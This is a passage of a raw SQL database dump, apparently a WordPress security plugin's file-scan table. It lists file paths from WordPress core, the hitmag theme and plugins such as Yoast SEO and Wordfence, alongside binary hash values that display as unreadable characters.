v<-�N�M�s�f�����rR�','',0,'?'),('��4}8�h�J\"g��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j��?�ǑA�.�K�\Z','���qg�q�C�(*�}��NA��(�F�\r����','',0,'?'),('�9��>���7','wp-includes/blocks/site-logo/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ҭ)j.G�Ơ>�','S���~p]^pT��7�mn�.��E��2V��','',0,'?'),('�,�4#��(�#','wp-signup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�$���|n@�0��','�]�Њ��g	j��\Z���w����5x�#a�','',0,'?'),('��L9��}�X�)�','wp-content/plugins/wordpress-seo/admin/statistics/class-statistics-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\����W����K�\0','�mH\\.�`����:J+Az���7�JQ�y\"x','',0,'?'),('�)�Pe��D��� s','wp-includes/blocks/group/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I����W�@�GB!?','�YTl$f���u|�O�bم� �#놊�)���','',0,'?'),('�v�+[.I$�]�T�','wp-includes/style-engine/class-wp-style-engine-processor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a9!�zY�ӏ����','քLU������a�v�r�B<ݳ���R���','',0,'?'),('ǖ��d�!s<X��Я','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�1{,˾�ʂ��','<�G���$�U+�k�L>\0h�ahB��S�-�','',0,'?'),('�oIa�\"?�8\n����q','wp-content/plugins/wp-fastest-cache/css/fonts/db/Flaticon.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"��뇸=�}@���bo','^$2νC�y1u�w���+�*a@0\n�\0?F�','',0,'?'),('�y�����s\r��','wp-content/plugins/wordpress-seo/css/dist/icons-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G\n�Nmm�^N�󵂡&','���<!�0{b2��Ņ���N���n���B','',0,'?'),('ۑ݀m�9��l�^�H�','wp-content/plugins/wordfence/images/logos/shield-premium.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r�-ȭ\nQ��V�','?mUL���-l��ZOI��,XS�M�׭�ޝ-�','',0,'?'),('�*沫�Q�N','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oV�7PR~׬���ai','b�\Z�����s#:�*�\\���\'�i@���qa','',0,'?'),('������\0�V�d�W2','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Exception/ParameterCircularReferenceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n̬�\'�^���e�{g�$','�B�^��x^(�H@W�q�s���O|�to��#','',0,'?'),('�m^�\"��p�','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)/4;�$۔�ެvi\\','�n���i��뗅�N�vX�7�Y]�����D','',0,'?'),('�\\�{����ԙ�UV�','wp-includes/blocks/navigation-link/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\Z5�̒9h','S�u�V$t�λ���S��\"�\0p�$��q�','',0,'?'),('��y7��MA�@���','wp-includes/widgets/class-wp-widget-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_!�uG(R-��Tr١','�d�nrz/��:dj\0��\'<�o͒4B��:�','',0,'?'),('\n�)J�`_,���J','wp-content/plugins/wp-fastest-cache/templates/lazy_load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6r�tSy�xQL�x�','���h����2E�M�݇�i�y�E���D��','',0,'?'),('�_)0d|�6_�;n','wp-includes/js/dist/rich-text.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��φ���z��ʘy��','��=���&� �-�d��.�U��!xO��(�','',0,'?'),('4��i���n-����','wp-content/plugins/wordpress-seo/src/presenters/slack/enhanced-data-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�MT��\'#�=��/�','rĪ:�����CI�	b�j}z���W�Ω','',0,'?'),('=�	��\\vV�����x','wp-includes/blocks/rss/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�- \n�ثYk�{�z',' 6/}mz\'h�S��4���^�8|,m�','',0,'?'),('f����r�(��S�y','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ne.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƁZ*�l|\nk*u�:���','zN��A��_�a���B�}(^w��*O�!.�','',0,'?'),('lm���\n�n���O�R','wp-content/themes/hitmag/inc/customizer/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mi�d�-.��O_�','j��h_\0%o{V���=%�����#&o�\'','',0,'?'),('��<��i����Q\0','wp-includes/js/dist/reusable-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��饑�m�=���','gk\'�g�\Z#�%���w��<�ͽ�cWC���d','',0,'?'),('�`&%eF�g����d','wp-content/plugins/wordfence/models/block/wfBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=���L@�ʐA��','\n�S�Y>�l�*ϸC@z&+ z�dAW���w�\n\r','',0,'?'),('��?Ϡ���򦳝�','wp-includes/wp-includes/js/jquery/jquery.js',0,';�o3�HH��䤱�&',';�o3�HH��䤱�&','�A���A�H�i�:�B�7����t��OFA','',0,'?'),('�M�ġ���wwK�N','wp-includes/js/dist/development/react-refresh-entry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��܇�{�{AvƸ�','�Է,�M�w}��_�9\'%���\0y��b','',0,'?'),('�\"�sybNl-���','wp-includes/blocks/preformatted/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)1n8.R���*','v�[��7�/N@3)}�o�x���t�7�Nk��','',0,'?'),('�:8�Ia��øl�m','wp-admin/includes/class-ftp-pure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T&�}�\\3��J�� \0','�\nS�{U��Cdz$����y���a|8�[','',0,'?'),('�-^*������ap�','wp-includes/wp-includes/sitemaps/class-wp-sitemaps-renderer.php',0,'V}d��T�ܧ�C\"º','V}d��T�ܧ�C\"º',':�i��K��,�c}i1�d��4l�c�2Œ�2','',0,'?'),('����KqM���{���','wp-admin/css/dashboard.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[uz$��\rWcY_','����.����?�i)PyhXo5�	Cr�/i','',0,'?'),('��sݜ�Þ3�����','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#��7Ih�!���_�','�y�۹�����������!�H���HGH','',0,'?'),('�{xZ�c�\"�hb�?�','wp-includes/js/dist/dom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6Ѿ��\\�a6)�','i����b�nOH�s����:(K@�ڠ��','',0,'?'),('�TB��O>�v2��}Ea','wp-includes/SimplePie/Locator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�ږ_����}��3�','�#�L�&$�FΪK#�\"�`Ԉ��MC�Wd','',0,'?'),('Ȓ\"N=�L��.�U','wp-includes/blocks/more/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5B:�\Z.+��=�w�','H4κ�	��-�U��y�e�=�����T\\','',0,'?'),('̸ԺS�u�,DX�m+`','wp-content/plugins/wp-cerber/assets/flags/gm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','џ凣8�OM�SNp�H','��<pn�\\�Z,х*�&��i�X��E(>~v','',0,'?'),('��ϝ��6=��̍�','wp-includes/blocks/post-excerpt/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��)\0Ь�/o','F�+h���p��a�qÉ�Fb�A�3i�<��','',0,'?'),('�1��(����oi��)','wp-includes/wp-includes/js/jquery/ui/effect-bounce.min.js',0,'��k�&�@��ڧrZ','��k�&�@��ڧrZ','�%MdžP��˧��3d(q��r�)i�x�>�','',0,'?'),('��)���iٮt�v�J','wp-content/plugins/wordpress-seo/packages/js/images/icon-twitter.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�쟚X�n�W��\'fP','��e��USq�����|��(v�y�V�%��3�X%','',0,'?'),('��W�MF`3��$��','wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��CECZ6���e�','\\W��.£���;\\	�K��[�zHEI�8��A','',0,'?'),('�@+�#:�?H@�Qw','wp-content/plugins/wordfence/js/Chart.bundle.min.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5]��d��d�f�','��>��`������NN�`�N\"K�Ӟc�kG<;','',0,'?'),('��5��F���bA��','wp-content/plugins/wordpress-seo/src/helpers/schema/html-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���JT���$w�R��Z','�C��82Z\'N�C���c)w��7pſ�є/','',0,'?'),('��*�7\r��?�','wp-includes/class-requests.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=n�L��jdBS;S?','D;U�\\�Q&�G���U��κ�\r����p-','',0,'?'),('�����c�3�9��[�','wp-includes/wp-includes/js/imagesloaded.min.js',0,':Vu+sf5�i����',':Vu+sf5�i����','����4H��1�Pc���)C6c�D�aHum\Z#cV','',0,'?'),('&�J]z8.걤K�*','wp-content/plugins/wordpress-seo/admin/google_search_console/class-gsc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����w^B���X1','�ts���`3�9�S���Ȋ_g���^�8','',0,'?'),('�s��y��%#�r��=','wp-includes/rest-api/endpoints/class-wp-rest-widget-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LΫ��C�a���\nd','��Z��W�\\Gץ0�t��9�/1�W1���','',0,'?'),('�of?�3�P�1�\"�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\"̤/O���Y��\'','�8�e�T�et\r j�P�/��J���<^�rӥz','',0,'?'),('#��e�������>��_','wp-content/plugins/wp-smushit/app/assets/js/smush-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�g$Jf�S��JA�','�\0��=��雀��\'k�A��	h�0�m���|','',0,'?'),('-��\nO8�U�E�{','wp-content/plugins/wp-cerber/assets/flags/bf.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\ZIO嫒�<�-L','I�}xh��bȲ\'�Gj�dG��0�\r','',0,'?'),('1a���������?�l','wp-includes/blocks/comments-pagination-previous.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�\'�ߔ�3�7k]�ZZ','3[,�n�G���1-�X�{������#����','',0,'?'),('3��9��v�&/�Cd�','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/MacAuthorizationTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0ld��lu�O�:��','��[��y��\\��پ�8*�&��= ��','',0,'?'),('F��e���}�(��','wp-includes/js/jquery/ui/dialog.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E���Vz��m���X','��Y�H���3����&|o��z�Z:d$���','',0,'?'),('X�\\j�½�\01,�^','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-zh_TW.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lƴ2[���O��� B','3��������L����(�r%���5�','',0,'?'),('\\wJ��]Բ�)��','wp-content/themes/twentytwentythree/templates/search.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��̀Y��\\H�@�','�t�q~��ה�0=\0�-�S�N�zUu��','',0,'?'),('i1��E~N�I�A͔��','wp-includes/Requests/Cookie/Jar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y6��������5�D�','��5�t���i�kt�j3�\r��h�v�acJ\r��','',0,'?'),('i~AV�GZ=u�9�','wp-includes/wp-includes/js/quicktags.js',0,':}���҈P��٭�',':}���҈P��٭�','=���/���f2A|��d���<��z�N�K=�','',0,'?'),('k��[V�l��Y�','wp-content/plugins/wordpress-seo/src/exceptions/indexable/invalid-term-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n��v��b��','_W䰈�V�fP�0	�[�i�L�4+��S>�D`�','',0,'?'),('s♼{DR�[�k�1�I','wp-content/plugins/wordfence/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zF��ހW�\rl�~6','V�{��Q9�V	����J	X�q���ڀc�','',0,'?'),('y�BɌ�l,\"�^��','wp-content/plugins/wordpress-seo/src/services/health-check/page-comments-runner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Υ�����T���}�*�','�:X�x5��<y��}�q���<dvvqc��[','',0,'?'),('~gŞE��e���VS','wp-content/themes/hitmag/inc/kirki/core/class-kirki-modules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"���x�u�c�2','�U�كʜ�{w(�^���<��t�k4�8�D�A','',0,'?'),('����X/��\0��	','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����iJ�B�!<\0','V��4�^�C�D�\Z��������;��U�z','',0,'?'),('���}/�pS���','wp-includes/blocks/page-list/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\&��h%\07&�9��','��@������[v��DSyޞ����b��y�J','',0,'?'),('�N3M�\n��S��0j','wp-includes/js/dist/block-library.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)%(KԞ$�nN��3…','>4s(�d��R�t�Y�Yv�y\"����� �CR`?','',0,'?'),('����R^��y\0Ƃj��','wp-content/plugins/wp-smushit/core/modules/helpers/class-iterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Uy\0V�����','�:�?]�������!�����+��U͹��','',0,'?'),('�D��2L�\\k0��4','wp-content/plugins/wordpress-seo/css/dist/monorepo-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�.�������b�','xL�ו\ZF�+@G�����.����T3�','',0,'?'),('ʳ9S5�z֏�\r_�','wp-includes/wp-includes/js/jquery/ui/resizable.min.js',0,'c0�N^�l�����L��','c0�N^�l�����L��','�~��i�{Q���ԯ��֕���YdF�w\r,�Ϲ','',0,'?'),('�x(�ťܺ�.���Շ','wp-includes/class-wp-session-tokens.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UԔ\r��UK^\"�h��',',�ؓˑ	>�v�>a�����\Z��e\r��v','',0,'?'),('Ԓ��A����r��^','wp-includes/js/wp-custom-header.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C@$ҷ�SE��#�','��\"�y�䓧��}��^H�z�%��Z��у���','',0,'?'),('�8r���~x�T�F�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-ru_RU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�\'�:��\Z��9I','�*�H�[8�em�\Zx�\Zc�=x�E����m','',0,'?'),('�z��a>`<��!�C�t','wp-includes/css/dist/block-library/reset.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jʵ�`��l٪����j','��x�c}\r����m�h�\nY��\r�ޒF�m2','',0,'?'),('�^0p����k����M','wp-includes/css/dist/nux/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�\0���3d]k���','�*�q۞})�Ȃ��|�n��\0 �&|�b�i�','',0,'?'),('�S	����g	N�d','wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Vg@�ݕX43�Ё',',D�U�}�>���q��!�5r�)0G����','',0,'?'),('���h]��C���A*','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'I�˞aFtz\\�Ǯ','���Ҭ�\ZADs���5����?���D�A/<�:','',0,'?'),('�0ܚ�Z�I�丱N','wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oP/����NC.3��','�I�CK�]�sX�\0��Jn�v��j2�T�.�}hG','',0,'?'),('�3ƹܕj�bi�Υ�','wp-includes/customize/class-wp-customize-nav-menu-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^���-�;O\'/u','����P2z�� i����߳1��!�^v>B2��','',0,'?'),('\Z6B8��c����eg','wp-includes/blocks/shortcode/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4>c�S�/\"�؇$��v','�ky�}�r�C��\"�Q}�3��i��$>V�','',0,'?'),('/�	f�N�_���g��','wp-content/themes/hitmag/inc/block-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')����bgjl�y]֨�','*#�,�0Ԯ�*\0�C���g�x�G�C//��','',0,'?'),('4���V�{yb�4i�K','wp-content/plugins/wp-smushit/core/api/class-abstract-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�/-Rr������:2	+','[��y`8��-.�L7\0&\\(`Lũ��%��G�','',0,'?'),('7D�4iY�2�KO�\Z\Z','wp-includes/wp-includes/customize/class-wp-customize-site-icon-control.php',0,'�$0V�����<','�$0V�����<','(V+���g��]�!�i�}w��š)��5m>-��','',0,'?'),('D�1�a��e��r�','wp-includes/wp-includes/css/media-views.min.css',0,'w�\0�]������	�-','w�\0�]������	�-','�{&B>�:]�\n��a��m����c�[zk!�','',0,'?'),('b���E�����4t=','wp-content/plugins/wordfence/views/dashboard/options-group-alert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̻o��wG>p','�I�`I^{�Pנh�Q��e:sG^��8�sĚ','',0,'?'),('j���Cj\'5�{����','wp-content/plugins/all-in-one-wp-security-and-firewall/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('{v�\\p ��F*�.8','wp-includes/wp-includes/js/jquery/ui/effect.min.js',0,'�8�b�N���\nk!?','�8�b�N���\nk!?','aQ���Qޖ�X�g�P�����;���:@�3�','',0,'?'),('~�x�Q��72��','wp-content/plugins/wp-cerber/assets/flags/tc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�t!�O<\n�u�','�\r�����/ޏ���� �t2�����H','',0,'?'),('������5�ފVV','wp-includes/wp-includes/js/dist/shortcode.js',0,'��ʼ�����|���U','��ʼ�����|���U','��9j�Z�-�T�(�(�kC�����r�uS�','',0,'?'),('��,‚=9���h�6K�','wp-includes/js/jquery/ui/draggable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8H��Jr6�x�\\','��\n�!�Q���Α���n�LA���:�<�','',0,'?'),('�/��҄p���d͟<','wp-includes/wp-includes/query.php',0,'O���o�y&���u','O���o�y&���u','Z�@�?@��ή��=���*^(21����y����','',0,'?'),('��un�Rـ���:9��','wp-content/plugins/all-in-one-wp-security-and-firewall/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\\"*��!83�+','��Ӻ:�B��ֶV�Ɍ)�Nɳ��p�','',0,'?'),('��T�j�����5�`q','wp-content/plugins/wordpress-seo/src/deprecated/admin/ajax/class-recalculate-scores-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V!��NVBw��@��H','�O\Z;P3s���#��w���j�Ο�j#���','',0,'?'),('���\n�r�)�M�f','wp-includes/wp-includes/class-wp-http-streams.php',0,'Oo�֪$N�~�F0�ۂ','Oo�֪$N�~�F0�ۂ','��d�	*ȩ�X���J�z9<��)�>�ԃtj','',0,'?'),('ņ#�8%��]�f���','wp-includes/wp-includes/sodium_compat/src/Core/Ed25519.php',0,'vr���Β;Y���o$Y','vr���Β;Y���o$Y','�����}� Y�1q$VY�8k\rt �o�ny�w�','',0,'?'),('Կ,6_���xd�ʞ','wp-content/plugins/wordpress-seo/admin/views/partial-notifications-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�|x��%rr�P�\rV','%�1\n�яr-4����-�x��ڠPJE3�H�r�','',0,'?'),('�#O�������X^�v','wp-content/plugins/redirection/models/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ӹx�v)�W�o�',':H,�}��\"V%5`<�Z`��u�T5\\}j���u�S','',0,'?'),('��>�/ᡇ_����','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l([qא��D#��','\\sٶ�hb�2.;�m`F��r^&�H-w	�yV�~','',0,'?'),('�&UX\r�L4{����','wp-includes/js/utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��˺�XH_�[ϓ��','������jtS�d�J�]��DާQ����','',0,'?'),('\ZmMcsr)�ԩ��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/CachingStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�.�\Z|9�;��z	Z','��	܌تB���va+��\Z/:�L ��n[v��F','',0,'?'),('\Z֧��\\\Z�h�i','wp-includes/js/dist/blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�K;\rMO�%�Q̉�','mʌDz@L��,�4;�ʤ	#�J�����k','',0,'?'),('\ZO�3F5K�;�@ �','wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�q\\�}����[�','�[�T�n�Ejd�(�$�:!�h�Ν\0�s�><','',0,'?'),('\Z$4B5%k���}�I��','wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-lossy.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߺ�.B��[�d�ci�','����%�x{\\�2��\Z��\'>����','',0,'?'),('\Z&�cR�< FiC�','wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ƥܐ�W^�[�g�','�dL�����cK~=0jE�]�����~\"�','',0,'?'),('\Z\'�N��󌰏�b9�r','wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/integrations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G\\���(AO�(�rJ','�ݖ�?�ixL�zK��\"3���X�6�>��H','',0,'?'),('\Z?M	_+�1���J�d�','wp-content/plugins/wp-smushit/core/class-modules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׬=�60�bOF_�.lސ','I�a�YR�<5�=L���hLb�9�ŦNT�','',0,'?'),('\Z?�ǸƢ}5^p��','wp-content/plugins/wordpress-seo/src/builders/indexable-post-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}���Xʹw��','9��D05����,��R؅�[~����;ɭ','',0,'?'),('\ZDc�iO\Z�5#,p�','wp-content/plugins/wp-cerber/assets/flags/ie.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?�ׅ�B\0n�-��','�&o]i�Z�$�Y��@�w��ox����v�:','',0,'?'),('\ZL�MS~�d�,T�7��','wp-includes/wp-includes/images/media/code.png',0,'-o��Uʓ��U�U_','-o��Uʓ��U�U_','\'eM a[R#q2��kz�+*<�����7\0��j','',0,'?'),('\Za��\'��M;��ȭUl','wp-includes/blocks/post-comments-form/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~����\"����K','ڔN~�E��K֋4ho�;̟V�o�U��\n\\�x','',0,'?'),('\Zn�8x]t����U�>�','wp-includes/wp-includes/wp-diff.php',0,' ��-x�<�z^�Wet',' ��-x�<�z^�Wet','�a��;�ɺ��*2Z��f1��\"�\n�Nt~�>��','',0,'?'),('\Z���w�,� -,:�&P','wp-content/plugins/wordpress-seo/admin/views/tabs/social/pinterest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^\Z�q_��,u��	h','H;4qʜ\'Y�C�\Z:��V�C�p�\Z-�{R�','',0,'?'),('\Z�����L6N�1�;8�','wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"���w^\n���k�6','�!�5�@�a�6t�o�5(D�s���\n��K�f','',0,'?'),('\Z�\Z!@%�U�鏂�Yq�','wp-includes/wp-includes/js/dist/block-serialization-default-parser.min.js',0,'ZZb&\'���C����','ZZb&\'���C����','���{���E�#G�`T`��4��4ܯ��','',0,'?'),('\Z��z_��o�I6���','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M2;���Y�4(9�','&�&��HO1=�����\0!i���0��mv��f','',0,'?'),('\Z��_�h��󠟽�x�','wp-content/plugins/wp-smushit/app/assets/css/smush-admin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A���`���U����','g+�e;��&���;�\\�j��x/I#��\'�	O\Z3','',0,'?'),('\Z���qB��P���','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�����l�����','P��j�k�Ȍ��$�g�P!5��gey�Bi�','',0,'?'),('\Z�;5�(��O�O�R�','wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ǜ����lm�D!','�\'�9�\r9�\0o|��\Z������|����0K','',0,'?'),('\Z�lW8��u�,��2h�','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/taxonomy-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����oI��G�9>\0��','~:Bf5>O���e?���|\0Қ�wM��oRn�wS','',0,'?'),('\Z�Ƞ)��Vv�%q�)�E','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/az.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<޻j�Ȭ\\f��','$=��\\dA�j�oo�\n0���\\�I�Rܻv^�4�','',0,'?'),('\Z�v���M_�6p�ue�','wp-includes/wp-includes/css/dist/components/style-rtl.css',0,' ��y�T�����&]H|�',' ��y�T�����&]H|�','RU\Z����[�^͝�/��a��/�9�\0�x��','',0,'?'),('\Z�Z��a�84��ǵ','wp-includes/wp-includes/js/dist/blob.min.js',0,'eLi���7�Mq\nk��','eLi���7�Mq\nk��','ZF�}��bgHCk��]��`�E|k�nW�','',0,'?'),('\Z����)qtsCI9','wp-includes/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�b�Z-�~\n,z��t�','΢)�a�����y�,f�5� \'�P>�@{3�','',0,'?'),('\Z�y��8R#O�y��','wp-admin/css/nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	�:И*���>#','6G��K=�Ӓ��ջ�5{56uÈ��(�=O�','',0,'?'),('\Z��\Z:\\��Rf�P�~3','wp-includes/class-wp-metadata-lazyloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%ٶ=+PX�KU�(�','�]�.5k�a��R�e�����NS��7\0���嘟','',0,'?'),('\Z�UE�s(��#E�p','wp-includes/images/smilies/icon_mrgreen.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$_��u�X|I%~$','!B���I1�mV�-���|ј�X5D�8���h�','',0,'?'),('\Z���/�̓��T%�g4','wp-includes/js/jquery/ui/effect-drop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L2�_C�9�sQ����','S�M�@ 